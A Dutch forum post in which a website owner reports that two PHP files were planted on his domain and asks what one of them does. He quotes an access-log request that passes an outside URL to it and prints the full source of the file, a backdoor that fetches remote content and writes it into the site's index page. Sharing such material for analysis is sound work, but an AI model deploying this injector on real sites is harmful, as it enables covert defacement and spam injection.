Mijn hosting provider maakte mij er op attent, dat een ip-adres voorkomend op een z.g. zwarte lijst tot mijn domein was doorgedrongen en daar mogelijk bestanden had geplaatst.
Het bleekt dat er 2 php bestandjes op mijn domein waren geplaatst terwijl ik überhaupt geen php gebruik.
Het ene bestandje bevatte alleen het commando "phpinfo", maar het andere was wat groter.
Volgens de logfile was dat bestand (01qcx.php) ook regelmatig aangesproken. Een voorbeeld:
[08/Jan/2010:07:43:02 +0100]
"GET /foto/01qcx.php?f=http://yourutils.com/upl/out/red.php HTTP/1.0" 404 - "-" "-"
Kan iemand uitleggen wat dat programmaatje (zie hieronder) doet of zou kunnen doen? Mijn provider (althans de helpdesk) stuurt mij het bos in
Het bleekt dat er 2 php bestandjes op mijn domein waren geplaatst terwijl ik überhaupt geen php gebruik.
Het ene bestandje bevatte alleen het commando "phpinfo", maar het andere was wat groter.
Volgens de logfile was dat bestand (01qcx.php) ook regelmatig aangesproken. Een voorbeeld:
[08/Jan/2010:07:43:02 +0100]
"GET /foto/01qcx.php?f=http://yourutils.com/upl/out/red.php HTTP/1.0" 404 - "-" "-"
Kan iemand uitleggen wat dat programmaatje (zie hieronder) doet of zou kunnen doen? Mijn provider (althans de helpdesk) stuurt mij het bos in
PHP:
<?php
header('Content-type: text/html; charset=utf-8');
$t = "../";
$r = ".html";
if(!file_exists($t."index".$r)) $r = ".htm";
if(!file_exists($t."index".$r)) $r = ".shtml";
if(!file_exists($t."index".$r)) $r = ".phtml";
if(!file_exists($t."index".$r)) $r = ".php";
if($_GET['add']){
$read = html_entity_decode(implode('',file($t."index".$r)));
if(!ereg("<!--LINKS-LINKS-->",$read)){
$fp = fopen($t."index".$r,"w");
if(fwrite($fp,$read."\n<!--LINKS-LINKS-->")) print "Setuped...";
fclose($fp);
} else print "Already....";
}
if($_GET['f']){
$f = file_get_contents($_GET['f']);
$read = html_entity_decode(implode('',file($t."index".$r)));
if(ereg("<!--LINKS-LINKS-->",$read)){
$ex = explode("<!--LINKS-LINKS-->",$read);
$fw = $ex[0]."<!--LINKS-LINKS-->".$f;
$fp = fopen($t."index".$r,"w");
if(fwrite($fp,$fw)) print "<h1>{OK!}</h1>";
fclose($fp);
}
}
?>
Laatst bewerkt door een moderator: